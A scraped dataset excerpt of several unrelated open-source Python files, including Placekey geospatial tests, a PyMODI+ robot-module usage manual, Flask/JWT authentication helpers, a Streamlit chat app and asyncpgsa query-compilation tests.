value')\n self.assertFalse(pk.placekey_format_is_valid('@@5vg-7gq-tvz'), 'multiple @ in placekey')\n\n def test_where_part_is_valid(self):\n \"\"\"\n Test validation of where parts\n \"\"\"\n self.assertTrue(pk._where_part_is_valid('5vg-7gq-tvz'),\n \"recognize valid where part\")\n self.assertFalse(pk._where_part_is_valid('5vg-7gq-tva'),\n \"recognize where part with invalid format\")\n self.assertFalse(pk._where_part_is_valid('zzz-zzz-zzz'),\n \"recognize where part with invalid h3 integer value\")\n\n\n def test_placekey_distance(self):\n \"\"\"\n Test distance computation between two Placekeys\n \"\"\"\n self.assertEqual(\n pk.placekey_distance(\n pk.geo_to_placekey(0.0, 0.0), pk.geo_to_placekey(0.0, 0.0)),\n 0.0,\n \"identical points have distance 0\")\n\n for i, sample in enumerate(self.distance_samples):\n difference = abs(\n pk.placekey_distance(sample['placekey_1'], sample['placekey_2']) -\n (sample['distance'] * 1000)\n )\n self.assertLessEqual(\n difference, 100,\n \"distances too far apart ({})\".format(i))\n\n def test_polygon_to_placekeys(self):\n \"\"\"\n Test generation of placekeys that intersect a polygon\n \"\"\"\n # Polygon is identical to the boundary of a single Placekey\n geo = (51.509865, -0.118092) # London\n poly = pk.placekey_to_polygon(pk.geo_to_placekey(*geo))\n keys_no_touching = pk.polygon_to_placekeys(poly, include_touching=False)\n keys_touching = pk.polygon_to_placekeys(poly, include_touching=True)\n\n self.assertCountEqual(\n keys_no_touching['interior'], ['@4hh-zvh-66k'],\n \"interior plackeys don't match\")\n self.assertCountEqual(\n keys_no_touching['boundary'], (),\n \"boundary plackeys don't match (no touching)\")\n self.assertCountEqual(\n keys_touching['boundary'],\n ('@4hh-zvh-649', '@4hh-zvh-ffz', '@4hh-zvh-fs5', '@4hh-zvh-6hq',\n '@4hh-zvh-gx5', '@4hh-zvh-6c5'),\n \"boundary plackeys don't match (touching)\")\n self.assertCountEqual(\n keys_no_touching['interior'], keys_touching['interior'],\n \"allow_touching flag doesn't impact interior\"\n )\n\n # Polygon contains no Placekey hexagons (it is a shrunk and translated\n # resolution 10 hexagon)\n poly = wkt_loads(\n 'POLYGON ((40.74001974100619 -73.9349274413473, '\n '40.73989965751763 -73.93565632113229, '\n '40.73939022508482 -73.93588138346178, '\n '40.73900088156213 -73.93537758083224, '\n '40.73912096147669 -73.93464871779295, '\n '40.73963038848786 -73.93442364063776, '\n '40.74001974100619 -73.9349274413473))')\n keys = pk.polygon_to_placekeys(poly)\n self.assertEqual(keys['interior'], (), \"no interior placekeys\")\n self.assertCountEqual(\n keys['boundary'],\n ('@627-s8p-vmk', '@627-s8p-xyv', '@627-s8p-xt9', '@627-s8p-vfz'),\n \"boundary placekey sets not equal\"\n )\n\n # This tests the WKT and GeoJSON wrappers\n geo = (41.2565, 95.9345)\n poly = pk.placekey_to_polygon(pk.geo_to_placekey(*geo)).buffer(0.01) # (lat, long)-tuples\n\n poly_keys = pk.polygon_to_placekeys(poly, include_touching=False, geo_json=False)\n\n wkt_keys = pk.wkt_to_placekeys(poly.wkt, include_touching=False, geo_json=False)\n\n # GeoJSON uses (long, lat) tuples. We'll test doing it both ways with the geo_json parameter.\n conformant_geojson_keys = pk.geojson_to_placekeys(\n transform(lambda lat, long: (long, lat), poly),\n include_touching=False,\n geo_json=True\n )\n\n non_conformant_geojson_keys = pk.geojson_to_placekeys(\n poly, include_touching=False, geo_json=False)\n\n self.assertCountEqual(poly_keys['interior'], wkt_keys['interior'],\n \"poly and wkt conversions' interiors don't match\")\n self.assertCountEqual(poly_keys['interior'], conformant_geojson_keys['interior'],\n \"poly and conformant geojson conversions' interiors don't match\")\n self.assertCountEqual(poly_keys['interior'], non_conformant_geojson_keys['interior'],\n \"poly and non-conformant geojson conversions' interiors don't match\")\n\n self.assertCountEqual(poly_keys['boundary'], wkt_keys['boundary'],\n \"poly and wkt conversions' interiors don't match\")\n self.assertCountEqual(poly_keys['boundary'], conformant_geojson_keys['boundary'],\n \"poly and conformant geojson conversions' interiors don't match\")\n self.assertCountEqual(poly_keys['boundary'], non_conformant_geojson_keys['boundary'],\n \"poly and non-conformant geojson conversions' interiors don't match\")\n","repo_name":"Placekey/placekey-py","sub_path":"placekey/tests/test_placekey.py","file_name":"test_placekey.py","file_ext":"py","file_size_in_byte":15379,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"19592683571","text":"#PROJECT EULER\r\n#P15: Lattice paths\r\n\r\n#Solved using permutation and combination(https://math.stackexchange.com/questions/286437/arrangement-of-binary-bits)\r\n\r\nimport math\r\nfrom math import factorial\r\nn=0\r\npaths =0\r\ndef num_grid(n):\r\n paths = factorial(n*2) / (factorial(n)**2)\r\n print(paths)\r\n\r\nprint(\"The number of paths in 20x20 grid are:\")\r\nnum_grid(20)\r\n","repo_name":"anishpai/Project-Euler","sub_path":"P15.py","file_name":"P15.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21631316169","text":"#-*-coding:utf-8-*-\n# 单例模式\nclass Car(object):\n __instace = None # 用于保存实例化的对象\n def __init__(self, name):\n self.name = name\n print('-----__init__方法被调用------')\n def __new__(cls, *k):\n print(\"--__new__方法被调用------\")\n if cls.__instace == None:\n cls.__instace = object.__new__(cls)\n return cls.__instace\n\nc1 = Car('c1')\nc2 = Car('c2')\nc3 = Car('c3')\nc4 = Car('c4')\nprint(id(c1))\nprint(id(c2))\nprint(id(c3))\nprint(id(c4))\n\n","repo_name":"nmww/p1804_ceshi","sub_path":"p1804_02高级/09-2018年6月13日异常-单例/p08_new创建魔法方法.py","file_name":"p08_new创建魔法方法.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"42824804013","text":"# Unit test example given.\n\nimport unittest\n\nfrom P1C11_mod import format_name\n\n\nclass NamesTestCase(unittest.TestCase):\n def test_first_last_name(self):\n formatted_name = format_name('janis', 'joplin')\n self.assertEqual(formatted_name, 'Janis Joplin')\n\n def test_first_last_middle(self):\n formatted_name = format_name('wolfgang', 'mozart', 'amadeus')\n self.assertEqual(formatted_name, 'Wolfgang Amadeus Mozart')\n\nif __name__ == '__main__':\n unittest.main()\n\n# 11-1,2\n\nfrom P1C11_mod import location\n\n\nclass TestLocation(unittest.TestCase):\n def test_city_country(self):\n description = location('boston', 'america')\n self.assertEqual(description, 'Boston, America')\n\n def test_city_country_pop(self):\n description = location('seattle', 'america', 1700000)\n self.assertEqual(description, 'Seattle, America - Population 1700000')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bradythehuman/Python-Crash-Course","sub_path":"P1C11.py","file_name":"P1C11.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1964338813","text":"import os\n\nfrom textwrap import fill\nfrom textwrap import dedent\n\n\nclass UsageInstructor:\n \"\"\"\n Usage Instructor teaches basic module usage of PyMODI+.\n It mainly teachs what methods are available for each module.\n \"\"\"\n\n row_len = 79\n\n def __init__(self):\n self.bundle = None\n self.led = None\n self.button = None\n\n @staticmethod\n def clear():\n clear_cmd = \"cls\" if os.name == \"nt\" else \"clear\"\n os.system(clear_cmd)\n\n def print_wrap(self, msg):\n message = fill(dedent(msg), self.row_len).lstrip()\n print(message)\n\n def print_topic(self, module_type):\n print(\"-\" * self.row_len)\n topic = f\"Usage Manual {module_type}\"\n print(f\"{topic:^{self.row_len}}\")\n print(\"-\" * self.row_len)\n\n def run_usage_manual(self):\n self.clear()\n print(\"=\" * self.row_len)\n print(f\"= {'Welcome to PyMODI+ Usage Manual':^{self.row_len - 4}} =\")\n print(\"=\" * self.row_len)\n\n selection = dedent(\n \"\"\"\n Modules available for usage:\n 1. Button\n 2. Dial\n 3. Env\n 4. Imu\n 5. Joystick\n 7. Tof\n 8. Display\n 9. Led\n 10. Motor\n 11. Speaker\n \"\"\"\n )\n print(selection)\n module_nb = int(input(\n \"Enter the module index (0 to exit) and press ENTER: \"\n ))\n self.clear()\n\n if not (0 <= module_nb <= 11):\n print(\"ERROR: invalid module index\")\n os._exit(0)\n\n run_selected_manual = {\n 0: self.exit,\n 1: self.run_button_manual,\n 2: self.run_dial_manual,\n 3: self.run_env_manual,\n 4: self.run_imu_manual,\n 5: self.run_joystick_manual,\n 7: self.run_tof_manual,\n 8: self.run_display_manual,\n 9: self.run_led_manual,\n 10: self.run_motor_manual,\n 11: self.run_speaker_manual,\n }.get(module_nb)\n run_selected_manual()\n\n #\n # Usage manuals for each module\n #\n def exit(self):\n os._exit(0)\n\n def run_button_manual(self):\n self.print_topic(\"Button\")\n\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n button = bundle.button[0]\n\n while True:\n if button.clicked:\n print(f\"Button({button.id}) is clicked!\")\n if button.double_clicked:\n print(f\"Button({button.id}) is double clicked!\")\n if button.pressed:\n print(f\"Button({button.id}) is pressed!\")\n if button.toggled:\n print(f\"Button({button.id}) is toggled!\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_dial_manual(self):\n self.print_topic(\"Dial\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n dial = bundle.dials[0]\n\n while True:\n print(f\"Dial ({dial.id}) turn: {dial.turn}\")\n print(f\"Dial ({dial.id}) speed: {dial.speed}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_env_manual(self):\n self.print_topic(\"Env\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n env = bundle.envs[0]\n\n while True:\n print(f\"Env ({env.id}) intensity: {env.intensity}\")\n print(f\"Env ({env.id}) temperature: {env.temperature}\")\n print(f\"Env ({env.id}) humidity: {env.humidity}\")\n print(f\"Env ({env.id}) volume: {env.volume}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_imu_manual(self):\n self.print_topic(\"Imu\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n imu = bundle.imus[0]\n\n while True:\n print(f\"Gyro ({imu.id}) roll: {imu.roll}\")\n print(f\"Gyro ({imu.id}) pitch: {imu.pitch}\")\n print(f\"Gyro ({imu.id}) yaw: {imu.yaw}\")\n print(f\"Gyro ({imu.id}) angular_vel_x: {imu.angular_vel_x}\")\n print(f\"Gyro ({imu.id}) angular_vel_y: {imu.angular_vel_y}\")\n print(f\"Gyro ({imu.id}) angular_vel_z: {imu.angular_vel_z}\")\n print(f\"Gyro ({imu.id}) acceleration_x: {imu.acceleration_x}\")\n print(f\"Gyro ({imu.id}) acceleration_y: {imu.acceleration_y}\")\n print(f\"Gyro ({imu.id}) acceleration_z: {imu.acceleration_z}\")\n print(f\"Gyro ({imu.id}) vibration: {imu.vibration}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_joystick_manual(self):\n self.print_topic(\"Joystick\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n joystick = bundle.joysticks[0]\n\n while True:\n print(f\"Joystick ({joystick.id}) x: {joystick.x}\")\n print(f\"Joystick ({joystick.id}) y: {joystick.y}\")\n print(f\"Joystick ({joystick.id}) direction: {joystick.direction}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_tof_manual(self):\n self.print_topic(\"Tof\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n tof = bundle.tofs[0]\n\n while True:\n print(f\"ToF ({tof.id}) distance: {tof.distance}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_display_manual(self):\n self.print_topic(\"Display\")\n print(dedent(\n \"\"\"\n import modi_plus\n\n bundle = modi_plus.MODIPlus()\n display = bundle.displays[0]\n\n # Set text to display, you can check the text being displayed\n display.set_text(\"Hello World!\")\n\n # Check what text has been displayed currently (in program)\n print(f\"Display ({display.id}) text: {display.text})\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_led_manual(self):\n self.print_topic(\"Led\")\n print(dedent(\n \"\"\"\n import modi_plus\n import time\n\n bundle = modi_plus.MODIPlus()\n\n led = bundle.leds[0]\n\n # Turn the led on for a second\n led.set_rgb(100, 100, 100)\n time.sleep(1)\n\n # Turn the led off for a second\n led.set_rgb(0, 0, 0)\n time.sleep(1)\n\n # Turn red on for a second\n led.set_rgb(100, 0, 0)\n time.sleep(1)\n\n led.set_rgb(0, 0, 0)\n\n # Turn green on for a second\n led.set_rgb(0, 100, 0)\n time.sleep(1)\n\n led.set_rgb(0, 0, 0)\n\n # Turn blue on for a second\n led.set_rgb(0, 0, 100)\n time.sleep(1)\n\n led.set_rgb(0, 0, 0)\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_motor_manual(self):\n self.print_topic(\"Motor\")\n print(dedent(\n \"\"\"\n import modi_plus\n import time\n\n bundle = modi_plus.MODIPlus()\n motor = bundle.motors[0]\n\n motor.set_angle(0, 70)\n time.sleep(1)\n\n motor.set_angle(60, 70)\n time.sleep(1)\n\n print(f\"motor ({motor.id}) angle: {motor.angle}\")\n\n motor.set_speed(20)\n time.sleep(1)\n\n print(f\"motor ({motor.id}) speed: {motor.speed}\")\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n\n def run_speaker_manual(self):\n self.print_topic(\"Speaker\")\n print(dedent(\n \"\"\"\n import modi_plus\n import time\n\n bundle = modi_plus.MODIPlus()\n speaker = bundle.speakers[0]\n\n speaker.set_tune(\"SOL6\", 50)\n time.sleep(1)\n \"\"\"\n ))\n input(\"Press ENTER to exit: \")\n self.run_usage_manual()\n","repo_name":"LUXROBO/pymodi-plus","sub_path":"modi_plus/util/usage_util.py","file_name":"usage_util.py","file_ext":"py","file_size_in_byte":8548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19552207202","text":"from flask import url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\n\n\ndef configure_sqlalchemy(app):\n db.init_app(app)\n migrate.init_app(app, db)\n\n\nlogin_manager = LoginManager()\n\n\ndef configure_login_manager(app):\n login_manager.init_app(app)\n login_manager.login_view = url_for(\"auth.login\")\n\n\ndef configure_template(app):\n @app.context_processor\n def inject_context():\n return {\n \"admin_sidebar\": app.config.get(\"ADMIN_SIDEBAR\"),\n \"admin_name\": app.config.get(\"APP_NAME\"),\n \"enumerate\": enumerate,\n }\n","repo_name":"magiskboy/flask-cms","sub_path":"cms/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1393136138","text":"#import libs\r\nimport openai \r\nimport streamlit as st\r\nimport io\r\nimport docx\r\nimport pandas as pd\r\nfrom transformers import GPT2TokenizerFast\\\r\n\r\n\r\n# pip install streamlit-chat \r\nfrom streamlit_chat import message\r\n\r\nopenai.api_key = st.secrets['openai-secret']\r\n\r\n#add title to \r\nst.title(\"chatBot : OpenAI\")\r\n\r\n#Initialising session\r\nif 'generated' not in st.session_state:\r\n st.session_state['generated'] = []\r\n\r\nif 'past' not in st.session_state:\r\n st.session_state['past'] = []\r\n\r\nif 'history' not in st.session_state:\r\n st.session_state['history'] = []\r\n\r\nif 'uploadKey' not in st.session_state:\r\n st.session_state['uploadKey'] = 1\r\n\r\ndef generate_response(prompt):\r\n chat = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo\",\r\n messages= prompt\r\n )\r\n return chat['choices'][0]['message']['content']\r\n\r\n#Form for user input\r\ndef update():\r\n st.session_state.text += st.session_state.text_value\r\n\r\n\r\nuploaded_file = st.file_uploader(\"Choose a CSV file\", key=st.session_state['uploadKey'])\r\nif uploaded_file is not None:\r\n df = pd.read_csv(uploaded_file)\r\n st.write(df)\r\n\r\nuser_input = st.text_input('Enter your prompt and click on submit', value=\"\", key='text_value')\r\n\r\n#Get user response\r\nif uploaded_file is not None and user_input != \"\":\r\n #Get user response\r\n user_input = user_input + df.to_json()\r\n st.session_state['uploadKey'] += 1\r\n\r\nif user_input:\r\n \r\n #Store the input\r\n st.session_state.history.append({\"role\": \"user\", \"content\": user_input})\r\n\r\n #Generate the response\r\n output = generate_response(st.session_state['history'])\r\n\r\n #Store the chat\r\n st.session_state.past.append(user_input)\r\n st.session_state.generated.append(output)\r\n st.session_state.history.append({\"role\": \"assistant\", \"content\": output})\r\n\r\n# Create an instance of a word document\r\ndef list_to_word_doc(items, doc_name):\r\n doc = docx.Document()\r\n for item in items:\r\n doc.add_paragraph(item)\r\n return doc\r\n\r\n#Chat history downloader\r\ndoc_download = list_to_word_doc(st.session_state['history'], 'chat_history')\r\n\r\nbio = io.BytesIO()\r\ndoc_download.save(bio)\r\nif doc_download:\r\n st.download_button(\r\n label=\"Download Chat History\",\r\n data=bio.getvalue(),\r\n file_name=\"chat_history.docx\",\r\n mime=\"docx\"\r\n )\r\n\r\n#display no of tokens\r\n#tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\r\n#number_of_tokens = len(tokenizer(''.join(st.session_state['history']))['input_ids'])\r\n\r\n#st.text('Number of tokens left: '+ str(max_tokens - number_of_tokens))\r\n\r\nif st.session_state['generated']:\r\n \r\n for i in range(len(st.session_state['generated'])-1, -1, -1):\r\n message(st.session_state[\"generated\"][i], key=str(i))\r\n message(st.session_state['past'][i], is_user=True, key=str(i) + '_user')\r\n","repo_name":"CodaLeon/CSVChatGPT","sub_path":"csvChatGPT.py","file_name":"csvChatGPT.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5378893046","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom linked_list.list_node import ListNode\nfrom linked_list.palindrome_list import PalindromeList\n\nclass TestPalindromeList(unittest.TestCase):\n def setUp(self):\n self.func = PalindromeList()\n\n def test_1(self):\n head = ListNode.build([1, 2])\n self.assertFalse(self.func.isPalindrome(head))\n\n def test_2(self):\n head = ListNode.build([1, 2, 2, 1])\n self.assertTrue(self.func.isPalindrome(head))\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/linked_list_test/test_palindrome_list.py","file_name":"test_palindrome_list.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35151188961","text":"import enum\nimport json\nimport logging\nimport uuid\nfrom functools import partial\n\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nfrom sqlalchemy.sql.ddl import CreateTable, DropTable\n\nfrom asyncpgsa import connection\n\nfile_table = sa.Table(\n 'meows', sa.MetaData(),\n sa.Column('id'),\n sa.Column('id_1'),\n)\n\n\nclass NameBasedEnumType(sa.types.TypeDecorator):\n impl = sa.types.Enum\n\n def __init__(self, enum_cls, **opts):\n assert issubclass(enum_cls, enum.Enum)\n self._opts = opts\n self._enum_cls = enum_cls\n enums = (m.name for m in enum_cls)\n super().__init__(*enums, **opts)\n\n def process_bind_param(self, value, dialect):\n return value.name if value else None\n\n def process_result_value(self, value: str, dialect):\n return self._enum_cls[value] if value else None\n\n def copy(self):\n return NameBasedEnumType(self._enum_cls, **self._opts)\n\n\nclass FileTypes(enum.Enum):\n TEXT = 0\n PNG = 1\n PDF = 2\n\n\nfile_type_table = sa.Table(\n 'meows2', sa.MetaData(),\n sa.Column('type', NameBasedEnumType(FileTypes)),\n sa.Column('name', sa.String(length=128)),\n)\n\n\ndef test_compile_query():\n ids = list(range(1, 4))\n query = file_table.update() \\\n .values(id=None) \\\n .where(file_table.c.id.in_(ids))\n q, p = connection.compile_query(query)\n assert q == 'UPDATE meows SET id=$1 WHERE meows.id IN ($2, $3, $4)'\n assert p == [None, 1, 2, 3]\n\n\ndef test_compile_text_query():\n sql = sa.text('SELECT :id, my_date::DATE FROM users').params(id=123)\n q, p = connection.compile_query(sql)\n assert q == 'SELECT $1, my_date::DATE FROM users'\n assert p == [123]\n\n\ndef test_compile_query_with_custom_column_type():\n query = file_type_table.insert().values(type=FileTypes.PDF)\n q, p = connection.compile_query(query)\n assert q == 'INSERT INTO meows2 (type) VALUES ($1)'\n assert p == ['PDF']\n\n\ndef test_compile_query_debug(caplog):\n \"\"\"Validates that the query is printed to stdout\n when the debug flag is enabled.\"\"\"\n ids = list(range(1, 3))\n query = file_table.update() \\\n .values(id=None) \\\n .where(file_table.c.id.in_(ids))\n\n with caplog.at_level(logging.DEBUG, logger='asyncpgsa.query'):\n results, _ = connection.compile_query(query)\n msgs = [record.msg for record in caplog.records]\n assert results in msgs\n\n\ndef test_compile_query_no_debug(caplog):\n \"\"\"Validates that no output is printed when\n the debug flag is disabled.\"\"\"\n ids = list(range(1, 3))\n query = file_table.update() \\\n .values(id=None) \\\n .where(file_table.c.id.in_(ids))\n\n with caplog.at_level(logging.WARNING, logger='asyncpgsa.query'):\n results, _ = connection.compile_query(query)\n msgs = [record.msg for record in caplog.records]\n assert results not in msgs\n\n\ndef test_compile_jsonb_with_custom_json_encoder():\n jsonb_table = sa.Table(\n 'meowsb', sa.MetaData(),\n sa.Column('data', postgresql.JSONB),\n )\n\n class JSONEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, uuid.UUID):\n return str(o)\n else:\n return super().default(o)\n\n dialect = connection.get_dialect(\n json_serializer=partial(json.dumps, cls=JSONEncoder)\n )\n\n data = {\n 'uuid4': uuid.uuid4(),\n }\n query = jsonb_table.insert().values(data=data)\n q, p = connection.compile_query(query, dialect=dialect)\n assert q == 'INSERT INTO meowsb (data) VALUES ($1)'\n assert p == ['{\"uuid4\": \"%s\"}' % data['uuid4']]\n\n\nddl_test_table = sa.Table(\n 'ddl_test_table', sa.MetaData(),\n sa.Column('int_col', sa.Integer),\n sa.Column('str_col', sa.String),\n)\n\ndef test_compile_create_table_ddl():\n create_statement = CreateTable(ddl_test_table)\n result, params = connection.compile_query(create_statement)\n assert result == (\n '\\nCREATE TABLE ddl_test_table (\\n\\tint_col'\n ' INTEGER, \\n\\tstr_col VARCHAR\\n)\\n\\n'\n )\n assert len(params) == 0\n\n\ndef test_compile_drop_table_ddl():\n drop_statement = DropTable(ddl_test_table)\n drop_query, params = connection.compile_query(drop_statement)\n assert drop_query == '\\nDROP TABLE ddl_test_table'\n assert len(params) == 0\n","repo_name":"CanopyTax/asyncpgsa","sub_path":"tests/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"53"} +{"seq_id":"10503983327","text":"import tempfile, os, os.path\nimport pyfaidx as fa\n\nimport nucleotides.filesystem as fs\n\n\ndef filter_contig_file(src_path, min_length):\n \"\"\"\n Filters a FASTA file containing contigs. Removes all contigs whose length is\n less than the supplied min length parameter.\n \"\"\"\n tmp = tempfile.mktemp(prefix = 'nucleotides_filtered_contigs')\n with open(tmp, 'w') as f:\n for contig in fa.Fasta(src_path):\n if len(contig) > min_length:\n f.write('>' + str(contig.long_name) + \"\\n\")\n for line in contig:\n f.write(str(line) + \"\\n\")\n digest = fs.sha_digest(tmp)\n dst = os.path.join(os.path.dirname(src_path), digest) + '.fa'\n os.remove(src_path)\n os.remove(src_path + '.fai')\n os.rename(tmp, dst)\n return dst\n","repo_name":"nucleotides/nucleotides-client","sub_path":"nucleotides/bio.py","file_name":"bio.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8802698138","text":"import os\nfrom datetime import datetime, timedelta\nfrom fastapi import Depends, HTTPException, status\nfrom fastapi.security import OAuth2PasswordBearer\nfrom jose import jwt, JWTError\nfrom typing import Union\nfrom models.user import UserModel\nfrom pydantic import BaseModel\n\n\nACCESS_TOKEN_EXPIRE_MINUTES = 30 # 30 minutes\nALGORITHM = \"HS256\"\nJWT_SECRET_KEY = os.environ['JWT_SECRET_KEY'] # should be kept secret\n\n\ndef create_access_token(data: dict):\n to_encode = data.copy()\n expire = datetime.utcnow() + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)\n to_encode.update({\"exp\": expire})\n to_encode.update({**data, \"exp\": expire})\n encoded_jwt = jwt.encode(to_encode, JWT_SECRET_KEY, ALGORITHM)\n\n return encoded_jwt\n\ndef decodeJWT(token: str) -> dict:\n try:\n print(token)\n decoded_token = jwt.decode(token, JWT_SECRET_KEY, algorithms=[ALGORITHM])\n print(decoded_token)\n print(decoded_token['exp'])\n print(decoded_token['exp'] >= datetime.utcnow())\n return decoded_token if decoded_token['exp'] >= datetime.utcnow() else None\n except:\n return {}\n\ndef get_user_info_by_token(token: str):\n # remove bearer from token\n token = token[7:]\n try:\n decoded_token = jwt.decode(token, JWT_SECRET_KEY, algorithms=[ALGORITHM])\n return decoded_token['username'], decoded_token['company']\n except:\n return None, None\n\n\nclass Token(BaseModel):\n access_token: str\n token_type: str\n\n\nclass TokenData(BaseModel):\n email: Union[str, None] = None\n\noauth2_scheme = OAuth2PasswordBearer(\n tokenUrl=\"/login\",\n scheme_name=\"JWT\"\n)\n\n\nasync def get_current_user(token: str = Depends(oauth2_scheme)):\n credentials_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Could not validate credentials\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n try:\n payload = jwt.decode(token, JWT_SECRET_KEY, algorithms=[ALGORITHM])\n email: str = payload.get(\"sub\")\n if email is None:\n raise credentials_exception\n token_data = TokenData(email=email)\n except JWTError:\n raise credentials_exception\n user = UserModel.get_user_by_email(email=token_data.email)\n if user is None:\n raise credentials_exception\n return user\n","repo_name":"Faripod/fastapi_mongo_url_shortner","sub_path":"app/utils/jwt.py","file_name":"jwt.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32941351232","text":"from typing import Any, Iterable, Union\n\nfrom aiohttp import ClientResponse, client_exceptions, http_exceptions, web_exceptions\nfrom marshmallow import EXCLUDE\n\nfrom aiosnow.exceptions import (\n ErrorResponse,\n InvalidContentMethod,\n RequestError,\n UnexpectedResponseContent,\n)\n\nfrom .schemas import ContentSchema\n\n\nclass Response(ClientResponse):\n \"\"\"Aiosnow Response class\n\n The Response object holds information about the ServiceNow HTTP response.\n\n Subclass of aiohttp.ClientResponse, its base reference documentation can be found here:\n https://docs.aiohttp.org/en/latest/client_reference.html#aiohttp.ClientResponse\n\n Attributes:\n - data: Deserialized (ContentSchema) response content\n - status: HTTP status code of response (int), e.g. 200\n - reason: HTTP status reason of response (str), e.g. \"OK\"\n - url: Request URL\n \"\"\"\n\n def __init__(self, *args: Any, **kwargs: Any):\n super(Response, self).__init__(*args, **kwargs)\n self.data: Union[list, dict, bytes, None] = None\n\n def __repr__(self) -> str:\n return (\n f\"<{self.__class__.__name__} {hex(id(self))} {self.url.path} \"\n f\"[{self.status} {self.reason}]>\"\n )\n\n def __getitem__(self, name: Any) -> Any:\n if isinstance(self.data, dict):\n return self.data.get(name)\n\n return None\n\n def __iter__(self) -> Iterable:\n if isinstance(self.data, list):\n yield from self.data\n elif isinstance(self.data, dict):\n yield from self.data.keys()\n else:\n raise InvalidContentMethod(f\"Cannot iterate over type: {type(self.data)}\")\n\n def __len__(self) -> int:\n if isinstance(self.data, list):\n return len(self.data)\n\n return 1\n\n async def load_document(self) -> None:\n \"\"\"Deserialize and set response content\n\n Raises:\n RequestError: If there was an error in the request-response content\n \"\"\"\n\n data = await self.json()\n\n if not isinstance(data, dict):\n if self.status == 204:\n self.data = {}\n return\n\n await self._handle_error()\n\n content = ContentSchema(unknown=EXCLUDE, many=False).load(data)\n\n if \"error\" in content:\n err = content[\"error\"]\n msg = (\n f\"{err['message']}: {err['detail']}\"\n if err[\"detail\"]\n else err[\"message\"]\n )\n\n raise RequestError(msg, self.status)\n\n self.data = content[\"result\"]\n\n async def _handle_error(self) -> None:\n \"\"\"Something went seriously wrong.\n\n This method interprets the error-response and raises the appropriate exception.\n\n Raises:\n - ServerError: If the error was interpreted as an unhandled server error\n - UnexpectedResponseContent: If the request was successful, but the request-response contains\n unexpected data\n \"\"\"\n\n try:\n # Something went wrong, most likely out of the ServiceNow application's control:\n # Raise exception if we got a HTTP error status back.\n self.raise_for_status()\n except (\n client_exceptions.ClientResponseError,\n http_exceptions.HttpProcessingError,\n ) as exc:\n raise ErrorResponse(exc.message, exc.code)\n except web_exceptions.HTTPException as exc:\n raise ErrorResponse(exc.text or \"\", exc.status)\n else:\n # Non-JSON content along with a HTTP 200 returned: Unexpected.\n text = await self.text()\n raise UnexpectedResponseContent(\n f\"Unexpected response received from server: {text}\", 200\n )\n","repo_name":"rbw/aiosnow","sub_path":"aiosnow/request/response/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"20543001452","text":"student = {'Tom', 'Jim', 